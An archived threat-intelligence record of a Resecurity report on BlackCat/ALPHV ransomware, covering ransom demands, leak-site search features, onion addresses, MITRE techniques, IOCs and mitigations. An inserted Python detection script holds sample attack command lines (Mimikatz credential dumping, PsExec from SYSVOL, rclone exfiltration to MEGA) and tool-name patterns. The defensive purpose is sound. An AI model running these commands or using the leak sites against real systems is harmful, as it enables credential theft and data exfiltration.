{
	"id": "ff5ea46d-a589-4fbc-a64f-76d610b1794e",
	"created_at": "2026-04-06T00:16:34.591351Z",
	"updated_at": "2026-04-10T03:29:39.819423Z",
	"deleted_at": null,
	"sha1_hash": "2b273a663877327c116b256bd92af5f2e853b427",
	"title": "Resecurity | BlackCat (aka ALPHV) Ransomware is Increasing Stakes up to $2,5M in Demands",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1134805,
	"plain_text": "Resecurity | BlackCat (aka ALPHV) Ransomware is Increasing Stakes up to $2,5M in Demands\r\nPublished: 2022-07-10 · Archived: 2026-04-05 13:01:38 UTC\r\nThe notorious cybercriminal syndicate competes with Conti and LockBit 3.0. It has introduced an advanced search over stolen victim passwords and confidential documents leaked on its TOR site.\r\nResecurity (USA), a Los Angeles-based cybersecurity company protecting Fortune 500 companies, has detected a significant increase in the value of ransom demands made by the notorious BlackCat ransomware gang. Such tactics significantly affect the ransomware underground ecosystem and hit businesses of all sizes hard worldwide. Based on recently compromised victims in the Nordic region, which the group has not yet disclosed, the amount demanded exceeds $2 million.\r\nBlackCat has been operating since at least November 2021 and has carried out major attacks, including the disruption of OilTanking GmbH, a German fuel company, in January 2022 and the attack on the aviation services company Swissport in February. Most recently, the group claimed responsibility for attacks against two U.S. universities, Florida International University and North Carolina A\u0026T State University.\r\nAccording to Resecurity, BlackCat actors have begun setting ransom demands of $2.5 million, with a possible discount of close to half to motivate the victim to resolve the incident as soon as possible. The time allowed for payment is typically 5-7 days, to give the victim time to purchase BTC or XMR. In case of difficulties, the victim may engage an “intermediary” for the recovery process.\r\nThe average ransomware payment climbed 82% from 2020 to a record high of $570,000 in the first half of 2021, and by 2022 it had almost doubled.
The latest forecast is for global ransomware extortion activity to reach $265 billion annually by 2031, with total damages for businesses valued at $10.5 trillion globally. Such figures would make ransomware the world’s largest \"shadow economy\", generating more damage in expenses than natural disasters. Unfortunately, despite DOJ guidance not to pay, over 48% of impacted organizations have paid cybercriminals because they had no alternative way to restore operations in time.\r\nExample of a BlackCat ransomware payment landing page with a payment deadline of July 14th\r\nBlackCat ransomware is one of the fastest-growing Ransomware-as-a-Service (RaaS) underground groups practicing so-called “quadruple extortion”, pressing victims to pay through:\r\n1. Encryption: Victims pay to regain access to scrambled data and compromised computer systems that stop working because key files are encrypted.\r\n2. Data Theft: Hackers release sensitive information if the ransom is not paid. As proof, the actors share a sample of the stolen data or a listing of the stolen files to remove any doubt about legitimacy.\r\n3. Denial of Service (DoS): Ransomware gangs launch denial-of-service attacks that take down a victim’s public websites.\r\n4. Harassment: Cybercriminals contact customers, business partners, employees, and the media to tell them the organization was hacked.\r\nhttps://resecurity.com/blog/article/blackcat-aka-alphv-ransomware-is-increasing-stakes-up-to-25m-in-demands\r\nPage 1 of 10\n\nBlackCat is also known as \"ALPHV\", \"AlphaVM\" or \"AlphaV\", a ransomware family written in the Rust programming language. In April 2022 the FBI published a flash alert about BlackCat ransomware, naming the group as one of the top ransomware threats.
The name “BlackCat” comes from the icon used on the ransom payment landing page:\r\nNotably, although BlackCat and ALPHV use completely different URLs on the TOR network, the scenarios used on their pages are identical and were likely developed by the same actors.\r\nhttp://alphvmmm27o3abo3r2mlmjrpdmzle3rykajqc5xsj7j7ejksbpsa36ad[.]onion\r\nhttp://wnlwdb6yumubpjwpnwvek6qs4mpudmhy7tyulaqbxmztgreobaevqkid[.]onion\r\nThe URL of a victim’s landing page typically carries an “access-key” query parameter:\r\nhttp://richfjtyp3wv7qmwuoolchurgyo52u64fkz634a5zh7tzweqwiukiuid[.]onion/?access-key=\r\nToday the group published new victims: COUNT+CARE GmbH (an information technology and services company from Germany), following Dusit D2 Kenz Hotel in Dubai, Sinclair Wilson (an accounting and wealth management firm from Australia), Adler Display of Baltimore, Maryland, the Japanese gaming giant Bandai Namco and the aerospace sensor maker Hydra-Electric of Burbank, California. The group publishes new victims roughly every 4 days. Notably, BlackCat and ALPHV differ in the ‘modus operandi’ of their extortion: the latter publicly shames victims on its TOR resource, while the former stays low-key and stealthy, attacking high-profile targets without further significant disclosure.\r\nDecember 4, 2021 – ALPHV published a posting on the Dark Web seeking experienced penetration testing specialists to compromise targets of interest. The post listed 2 TOX IM contacts and a Jabber address:\r\nBased on analysis of the latest incidents, BlackCat appends a randomized extension after encryption, stated to be 6 characters, although the sample observed, \".sxuetaf\", is seven characters long. This resembles LockBit (7 characters), NetWalker (6 characters) and Locky (5 characters). Notably, multiple BlackCat victims were identified with a 7-character extension, as with the LockBit 2.0 strain.\r\nThe group was one of the first to introduce a “search” over leaked data. It allows employees and customers of an affected company to check whether their data has been exposed.\r\nIn a post from 10 Jul 2022, 15:35, on the Dark Web, the group introduced search not only by text signatures but also with tags for searching passwords and compromised PII.\r\nTranslation:\r\nDear forum users, we want to introduce to you our repository of leaks with a search feature.\r\nOn our resource you may always quickly find documents (IDs, DL, SSN), access credentials, passwords, confidential information by company name, and a lot more!\r\nThe information imported into the system has been acquired by our team from real victims’ networks. The search can be performed by the name of the file/folder, but also by content (of the file), including images.
The tool will find text recognized in the image, including in the body of a PDF document.\r\nExamples:\r\n- Search by the name of the company (victim):\r\nalphvmmm27o3abo3r2mlmjrpdmzle3rykajqc5xsj7j7ejksbpsa36ad[.]onion/search?text=”JP Morgan”\r\n- Search for passwords:\r\nalphvmmm27o3abo3r2mlmjrpdmzle3rykajqc5xsj7j7ejksbpsa36ad[.]onion/search?text=password:\r\n- Search for confidential documents:\r\nalphvmmm27o3abo3r2mlmjrpdmzle3rykajqc5xsj7j7ejksbpsa36ad[.]onion/search?text=”non disclosure agreement”\r\nEverything is absolutely free and “as is”.\r\nIt seems that some of the stolen files are still being indexed, but the majority is already available for quick navigation.\r\nOver 2,270 indexed documents were identified containing access credentials and passwords in plaintext, and over 100,000 documents carrying a confidentiality marking.\r\nALPHV appears to be competing heavily with LOCKBIT and CONTI, two other actively developing ransomware syndicates, which have called ALPHV “scammers”. The statement was likely related to a conflict between initial access brokers (IABs), affiliates and team members who could be associated with both projects at different stages.\r\nALPHV has been associated with two other ransomware groups: DarkSide and BlackMatter. Design overlaps between ALPHV and DarkSide have prompted rumors that ALPHV was a rebrand of DarkSide following the latter’s high-profile attack on Colonial Pipeline. On underground cybercriminal forums, the representative of the “LockBit” ransomware also started threads stating that ALPHV was a rebrand of the DarkSide and BlackMatter RaaS programs.
While ALPHV has denied being a rebrand of DarkSide or BlackMatter, developers and money launderers from ALPHV are linked to DarkSide/BlackMatter, according to the FBI. Therefore, while ALPHV may not be a rebrand, it is likely that the group recruited many members from these now inactive ransomware gangs.\r\nOne of the first public appearances of ALPHV occurred on the RAMP cybercriminal forum on 09 Dec 2021, where a representative of the group promoted the ALPHV RaaS program and attempted to recruit affiliates. In this post, ALPHV operators advertised the new “ALPHV-ng (New Generation)” RaaS partner program, which they described as the next generation of ransomware. The ransomware had been written from scratch and offered many features, including:\r\nFour encryption modes: full, fast, DotPattern, and Auto, using the two encryption algorithms ChaCha20 and AES.\r\nInfrastructure fragmented into interconnected nodes located behind “NAT + FW”, set up so that the attackers do not reveal the real IP addresses of their servers when receiving command shells.\r\nFunctional on different platforms, including various versions of Linux (ESXi, Debian, Ubuntu, and ReadyNAS) and all versions of Windows from Windows 7 and above.\r\nA “unique onion domain” generated for “each new victim”.\r\nResecurity’s HUNTER unit has noticed significant developments on the RAMP forum (a ransomware underground community) and expects to see more activity from competing groups, including LockBit 3.0.\r\nActors involved in the ransomware business are trying to isolate themselves from semi-public or well-recognized Dark Web forums in order to build a community of vetted initial access brokers, ransomware developers, and actors involved in other related operations.\r\nMITRE ATT\u0026CK:\r\n[T1592] Gather Victim Host Information\r\n[T1586] Compromise Accounts\r\n[T1490] Inhibit System Recovery\r\n[T1590] Gather Victim Network Information\r\n[T1486] Data Encrypted for Impact\r\n[T1040] Network Sniffing\r\n[T1133] External Remote Services\r\n[T1098] Account Manipulation\r\n[T1053] Scheduled Task/Job\r\n[T1078] Valid Accounts\r\n[T1484] Domain Policy Modification\r\n[T1222] File and Directory Permissions Modification\r\n[T1036] Masquerading\r\n[T1003] OS Credential Dumping\r\n[T1528] Steal Application Access Token\r\n[T1558] Steal or Forge Kerberos Tickets\r\n[T1212] Exploitation for Credential Access\r\n[T1555] Credentials from Password Stores\r\n[T1482] Domain Trust Discovery\r\n[T1083] File and Directory Discovery\r\n[T1615] Group Policy Discovery\r\n[T1072] Software Deployment Tools\r\n[T1020] Automated Exfiltration\r\n[T1048] Exfiltration Over Alternative Protocol\r\n[T1537] Transfer Data to Cloud Account\r\nTooling:\r\nThe BlackCat arsenal employs multiple tools for network intrusion and post-exploitation targeting Active Directory, including but not limited to:\r\n- ADRecon, an Active Directory reconnaissance tool for Windows environments;\r\n- Cobalt Strike, a post-exploitation framework;\r\n- PsExec, for lateral movement in the victim’s network;\r\n- Mimikatz, the well-known credential-dumping tool;\r\n- NirSoft utilities, to extract stored network passwords.\r\nDue to the significant number of affiliates and independent initial access brokers (IABs) collaborating with the BlackCat group, the tooling may vary.
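Several of the mitigations in this report (reviewing scheduled tasks, hunting for new accounts, auditing what runs from domain shares) follow directly from the tooling above and from the domain-wide deployment this report attributes to BlackCat: a locker staged on the SYSVOL share and pushed out through scheduled tasks and GPOs. The following Python script is an added example, not code from Resecurity or from the BlackCat operators. It applies a small rule set to Windows Security and Sysmon events (process creation 4688, scheduled task creation 4698, account creation 4720, Sysmon file create 11) and flags known tool names in command lines, executables written to or launched from SYSVOL/NETLOGON, task actions that point outside trusted roots, and newly created accounts. The events are constructed sample records with simplified field names (image, cmdline, path, task, command, target); the host names, paths and account names are invented, and the tool-name patterns are an assumption about how those tools typically appear on disk, not indicators from this report.

```python
import re
from collections import Counter

BS = chr(92)  # a single backslash, spelled out so this listing contains no escape sequences


def win(*parts):
    # Join path components with backslashes: win('C:', 'Windows') -> C:\Windows
    return BS.join(parts)


def unc(*parts):
    # Build a UNC path: unc('corp.local', 'SYSVOL') -> \\corp.local\SYSVOL
    return BS + BS + BS.join(parts)


def norm(p):
    # Lower-case and collapse separators to '/' so one rule covers local and UNC spellings.
    return p.replace(BS, '/').lower()


# Tools this page associates with BlackCat affiliates, matched against image path plus command line
# (assumed on-disk names and Mimikatz module prefixes; adjust to your own telemetry).
TOOL_PATTERNS = {
    'PsExec':       re.compile(r'psexec|psexesvc'),
    'Mimikatz':     re.compile(r'mimikatz|sekurlsa::|lsadump::'),
    'ADRecon':      re.compile(r'adrecon'),
    'NirSoft':      re.compile(r'netpass|webbrowserpassview|mailpv'),
    'AdFind':       re.compile(r'(^|/)adfind([.]exe)?( |$)'),
    'Rclone':       re.compile(r'(^|/)rclone([.]exe)?( |$)'),
    'MEGAsync':     re.compile(r'megasync'),
    'BloodHound':   re.compile(r'sharphound|bloodhound'),
    'CrackMapExec': re.compile(r'crackmapexec|(^|/)cme([.]exe)?( |$)'),
    'Rubeus':       re.compile(r'rubeus'),
    'Inveigh':      re.compile(r'inveigh'),
}

EXEC_EXT = ('.exe', '.dll', '.bat', '.cmd', '.ps1', '.vbs')
SHARE_MARKERS = ('/sysvol/', '/netlogon/')
# Task actions under these roots are treated as expected; anything else is put up for review.
TRUSTED_ROOTS = ('c:/windows/', 'c:/program files', '%windir%', '%systemroot%', '%programfiles%')


def triage(events):
    # Apply the rules to a list of event dicts; returns (index, rule, host, detail) tuples.
    findings = []
    for i, ev in enumerate(events):
        eid = ev['id']
        if eid == 4688:  # process creation
            hay = norm(ev['image'] + ' ' + ev['cmdline'])
            for name, pat in TOOL_PATTERNS.items():
                if pat.search(hay):
                    findings.append((i, 'tool:' + name, ev['host'], ev['cmdline']))
            if any(m in hay for m in SHARE_MARKERS):
                findings.append((i, 'exec-from-sysvol', ev['host'], ev['cmdline']))
        elif eid == 11:  # Sysmon file create: an executable landing on a domain share is staging
            p = norm(ev['path'])
            if any(m in p for m in SHARE_MARKERS) and p.endswith(EXEC_EXT):
                findings.append((i, 'sysvol-staging', ev['host'], ev['path']))
        elif eid == 4698:  # scheduled task created: action on a UNC path or outside trusted roots
            cmd = norm(ev['command'])
            if cmd.startswith('//') or not cmd.startswith(TRUSTED_ROOTS):
                findings.append((i, 'suspicious-task', ev['host'], ev['task'] + ' -> ' + ev['command']))
        elif eid == 4720:  # user account created: always worth a look during an intrusion
            findings.append((i, 'new-account', ev['host'], ev['target']))
    return findings


def summarize(findings):
    # Count hits per rule so a large batch can be skimmed before reading each one.
    return Counter(rule for _, rule, _, _ in findings)


# Constructed sample telemetry (not real data). 'id' is the Security event ID or Sysmon event 11;
# the remaining keys are a simplified mapping of the real event fields.
SAMPLE_EVENTS = [
    {'id': 4688, 'host': 'WS-042', 'image': win('C:', 'Windows', 'System32', 'svchost.exe'),
     'cmdline': 'svchost.exe -k netsvcs'},
    {'id': 4688, 'host': 'WS-042', 'image': win('C:', 'Users', 'jdoe', 'AppData', 'Local', 'Temp', 'm.exe'),
     'cmdline': 'm.exe privilege::debug sekurlsa::logonpasswords exit'},
    {'id': 4688, 'host': 'SRV-FS1', 'image': win('C:', 'Tools', 'PsExec64.exe'),
     'cmdline': 'PsExec64.exe -accepteula -s ' + unc('SRV-DB2') + ' cmd /c '
                + unc('corp.local', 'SYSVOL', 'corp.local', 'scripts', 'upd.exe')},
    {'id': 4688, 'host': 'WS-017', 'image': win('C:', 'ProgramData', 'rclone.exe'),
     'cmdline': 'rclone.exe copy ' + win('E:', 'Finance') + ' mega:dump --transfers 32'},
    {'id': 11, 'host': 'DC-01', 'path': unc('corp.local', 'SYSVOL', 'corp.local', 'scripts', 'upd.exe')},
    {'id': 11, 'host': 'DC-01', 'path': win('C:', 'Windows', 'SYSVOL', 'domain', 'Policies', 'GPT.INI')},
    {'id': 4698, 'host': 'WS-017', 'task': win('', 'upd'),
     'command': unc('corp.local', 'SYSVOL', 'corp.local', 'scripts', 'upd.exe')},
    {'id': 4698, 'host': 'WS-017', 'task': win('', 'Microsoft', 'Windows', 'Defrag', 'ScheduledDefrag'),
     'command': win('%windir%', 'system32', 'defrag.exe')},
    {'id': 4720, 'host': 'DC-01', 'target': 'support_tmp'},
]

if __name__ == '__main__':
    hits = triage(SAMPLE_EVENTS)
    for idx, rule, host, detail in hits:
        print(f'[{rule}] event {idx} on {host}: {detail}')
    print(dict(summarize(hits)))
```

On the sample set the benign records (svchost, the GPT.INI write under SYSVOL, the built-in defrag task) produce no findings, while the Mimikatz command line, the PsExec launch of a binary from SYSVOL, the rclone transfer, the executable staged in SYSVOL, the task pointing at that UNC path and the new account are each reported once. The GPT.INI case is the important false-positive check: Group Policy writes to SYSVOL constantly, so the staging rule keys on executable extensions rather than on the share alone.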
The tools most commonly seen in DFIR engagements are:\r\n- BloodHound\r\n- SoftPerfect NetScan\r\n- CrackMapExec\r\n- Inveigh/InveighZero\r\n- MEGAsync\r\n- RClone\r\n- AdFind\r\n- Rubeus\r\n- StealBit\r\n- ExMatter, an exfiltration tool earlier seen in the arsenal of BlackMatter affiliates\r\nSome of these tools are packaged and dropped on the victim’s machine by a dropper (a .bat or PowerShell script).\r\nTactics \u0026 Procedures:\r\nWhile the approach used by BlackCat is not unique and is widely used by other actors attacking enterprise networks, the following aspects are relevant to its ransomware activity:\r\n- Using the SYSVOL share to store the BlackCat cryptor (locker) so that it replicates to other hosts within the same Active Directory domain;\r\n- The malware uses Windows Task Scheduler to configure malicious Group Policy Objects (GPOs) that deploy the ransomware;\r\n- Active exploitation of CVE-2021-31207, CVE-2021-34473, and CVE-2021-34523 (the ProxyShell chain) to target Microsoft Exchange;\r\n- Evasive tactics, such as masking a tampered DLL to make it seem legitimate;\r\n- Before the encryption process, comprehensive preparation to prevent a roll-back to normal operations from backups stored on the network.\r\nIn Linux environments, once initial access is obtained, the actors establish reverse SSH tunnels as a command-and-control (C2) channel between victims and BlackCat infrastructure.\r\nKnown TOR nodes:\r\nalphvmmm27o3abo3r2mlmjrpdmzle3rykajqc5xsj7j7ejksbpsa36ad[.]onion\r\njjeqizt46yqydabjkdkfsiptzfzcbzjkcaou77v7ljoxgsyg3e5luqqd[.]onion\r\npmpkjv36ca5ykwmjnfnr5cadctt4ldcekaxocbwa57btujhi7mly6kid[.]onion\r\nhzdpwv5jqjcbstv5kassyxztdkacwi4ucleomgpqmxcwan5ydzqh5mid[.]onion\r\nid7seexjn4bojn5rvo4lwcjgufjz7gkisaidckaux3uvjc7l7xrsiqad[.]onion\r\nsty5r4hhb5oihbq2mwevrofdiqbgesi66rvxr5sr573xgvtuvr4cs5yd[.]onion\r\nhtnpafzbvddr2llstwbjouupddflqm7y7cr7tcchbeo6rmxpqoxcbqqd[.]onion\r\naoczppoxmfqqthtwlwi4fmzlrv6aor3isn6ffaiic55wrfumxslx3vyd[.]onion\r\n5e2q3uzczl3bur23dxfxxu5unlukuqrlseesmxc7v7dmo4qgbr3kaxqd[.]onion\r\nvldmvht6s253et33ce6gcth2vikuvsi7xgkzim5frqiowq6an6tmlaad[.]onion\r\nkxmbveamxzfrnxacprpbldcy3p263kvrjiblaw4p55mzrkaf3si6w4id[.]onion\r\ndoh3rlqtvg24yu4r4w7bk5twm7w6nm7wqsr3d3roc7jisrdqf5catnad[.]onion\r\ndcoezwwwxij2trzd3oqhtyjg3lgvgzmyzrj2pcs3rdfh4tl5267dwpyd[.]onion\r\ns5hcgpxzeehnkwlpb3xkelvkv6rpi5rszmhfeywncja26bxdzexp6zqd[.]onion\r\noylk6phjrgcjvhv5rjijwrpcqj4ig3f2evbxb6lzofw7cbgxlpetq7ad[.]onion\r\nfbehz3443h644jrcu3djvexhplhmnijilkq54puzrxuvloc42oykgiad[.]onion\r\nkv7nxc6sg625vl4rd4fsy4asero3jqivp7zyhaohsyww2xnk7r7yenyd[.]onion\r\nacvhxy4cc52a7iv7ugc4eq6dq6nus2s5xduew7s2wkaw6nhftasyq2yd[.]onion\r\nwnlwdb6yumubpjwpnwvek6qs4mpudmhy7tyulaqbxmztgreobaevqkid[.]onion\r\nzf3raijx7m6xm72uenqrql5b2qtkbvnxi7fgzqjxfcizp7lylmvzvdid[.]onion\r\nsmo3gebcr5mkff7ja5ayi2xdz2xsapdixak4eosj5ah6fgrbluoxrkqd[.]onion\r\n2cuqgeerjdba2rhdiviezodpu3lc4qz2sjf4qin6f7std2evleqlzjid[.]onion\r\nvqifktlreqpudvulhbzmc5gocbeawl67uvs2pttswemdorbnhaddohyd[.]onion\r\njrq44df5h2xysjsajuidspv7zxl7g7v7viujicudptufaozi2i65cnad[.]onion\r\ncfj4bsnfi4ktpfoei7uqggz5sb443fhvvbkxbmu3dhfriomg2txxgxid[.]onion\r\nzujgzbu5y64xbmvc42addp4lxkoosb4tslf5mehnh7pvqjpwxn5gokyd[.]onion\r\ns7isfnfsrrnogkkvzzmqpqlcehajalaht5nmel7nbxwhvqc52jj2ejid[.]onion\r\nmu75ltv3lxd24dbyu6gtvmnwybecigs5auki7fces437xvvflzva2nqd[.]onion\r\nIOCs (SHA-256):\r\nf815f5d6c85bcbc1ec071dd39532a20f5ce910989552d980d1d4346f57b75f89\r\nc3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40\r\n74464797c5d2df81db2e06f86497b2127fda6766956f1b67b0dcea9570d8b683\r\n4e18f9293a6a72d5d42dad179b532407f45663098f959ea552ae43dbb9725cbf\r\n1af1ca666e48afc933e2eda0ae1d6e88ebd23d27c54fd1d882161fd8c70b678e\r\n15b57c1b68cd6ce3c161042e0f3be9f32d78151fe95461eedc59a79fc222c7ed\r\n13828b390d5f58b002e808c2c4f02fdd920e236cc8015480fa33b6c1a9300e31\r\nc8b3b67ea4d7625f8b37ba59eed5c9406b3ef04b7a19b97e5dd5dab1bd59f283\r\nbd337d4e83ab1c2cacb43e4569f977d188f1bb7c7a077026304bf186d49d4117\r\n7b2449bb8be1b37a9d580c2592a67a759a3116fe640041d0f36dc93ca3db4487\r\n38834b796ed025563774167716a477e9217d45e47def20facb027325f2a790d1\r\n2cf54942e8cf0ef6296deaa7975618dadff0c32535295d3f0d5f577552229ffc\r\n28d7e6fe31dc00f82cb032ba29aad6429837ba5efb83c2ce4d31d565896e1169\r\n0c6f444c6940a3688ffc6f8b9d5774c032e3551ebbccb64e4280ae7fc1fac479\r\nf8c08d00ff6e8c6adb1a93cd133b19302d0b651afd73ccb54e3b6ac6c60d99c6\r\n731adcf2d7fb61a8335e23dbee2436249e5d5753977ec465754c6b699e9bf161\r\n59868f4b346bd401e067380cac69080709c86e06fae219bfb5bc17605a71ab3f\r\n3d7cf20ca6476e14e0a026f9bdd8ff1f26995cdc5854c3adb41a6135ef11ba83\r\n7e363b5f1ba373782261713fa99e8bbc35ddda97e48799c4eb28f17989da8d8e\r\ncefea76dfdbb48cfe1a3db2c8df34e898e29bec9b2c13e79ef40655c637833ae\r\nMitigation Strategies:\r\n- Review domain controllers, servers, workstations, and Active Directory for new or unrecognized user accounts.\r\n- Regularly back up data; air-gap and password-protect backup copies offline. Ensure copies of critical data cannot be modified or deleted from the system where the data resides.\r\n- Review Task Scheduler for unrecognized scheduled tasks. Additionally, manually review operating-system-defined or recognized scheduled tasks for unrecognized “actions” (for example, review the steps each scheduled task is expected to perform).\r\n- Review antivirus logs for indications that protection was unexpectedly turned off.\r\n- Implement network segmentation.\r\n- Require administrator credentials to install software.\r\n- Implement a recovery plan that maintains and retains multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, secure location (e.g., hard drive, storage device, the cloud).\r\n- Install updates and patch operating systems, software, and firmware as soon as they are released.\r\n- Use multifactor authentication where possible.\r\n- Regularly change passwords for network systems and accounts, and avoid reusing passwords across accounts.\r\n- Implement the shortest acceptable timeframe for password changes.\r\n- Disable unused remote access/Remote Desktop Protocol (RDP) ports and monitor remote access/RDP logs.\r\n- Audit user accounts with administrative privileges and configure access controls with least privilege in mind.\r\n- Install and regularly update antivirus and anti-malware software on all hosts.\r\n- Only use secure networks and avoid public Wi-Fi networks. Consider installing and using a virtual private network (VPN).\r\n- Consider adding an email banner to emails received from outside your organization.\r\n- Disable hyperlinks in received emails.\r\nSource: https://resecurity.com/blog/article/blackcat-aka-alphv-ransomware-is-increasing-stakes-up-to-25m-in-demands",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://resecurity.com/blog/article/blackcat-aka-alphv-ransomware-is-increasing-stakes-up-to-25m-in-demands"
	],
	"report_names": [
		"blackcat-aka-alphv-ransomware-is-increasing-stakes-up-to-25m-in-demands"
	],
	"threat_actors": [
		{
			"id": "6e23ce43-e1ab-46e3-9f80-76fccf77682b",
			"created_at": "2022-10-25T16:07:23.303713Z",
			"updated_at": "2026-04-10T02:00:04.530417Z",
			"deleted_at": null,
			"main_name": "ALPHV",
			"aliases": [
				"ALPHV",
				"ALPHVM",
				"Ambitious Scorpius",
				"BlackCat Gang",
				"UNC4466"
			],
			"source_name": "ETDA:ALPHV",
			"tools": [
				"ALPHV",
				"ALPHVM",
				"BlackCat",
				"GO Simple Tunnel",
				"GOST",
				"Impacket",
				"LaZagne",
				"MEGAsync",
				"Mimikatz",
				"Munchkin",
				"Noberus",
				"PsExec",
				"Remcom",
				"RemoteCommandExecution",
				"WebBrowserPassView"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434594,
	"ts_updated_at": 1775791779,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/2b273a663877327c116b256bd92af5f2e853b427.pdf",
		"text": "https://archive.orkl.eu/2b273a663877327c116b256bd92af5f2e853b427.txt",
		"img": "https://archive.orkl.eu/2b273a663877327c116b256bd92af5f2e853b427.jpg"
	}
}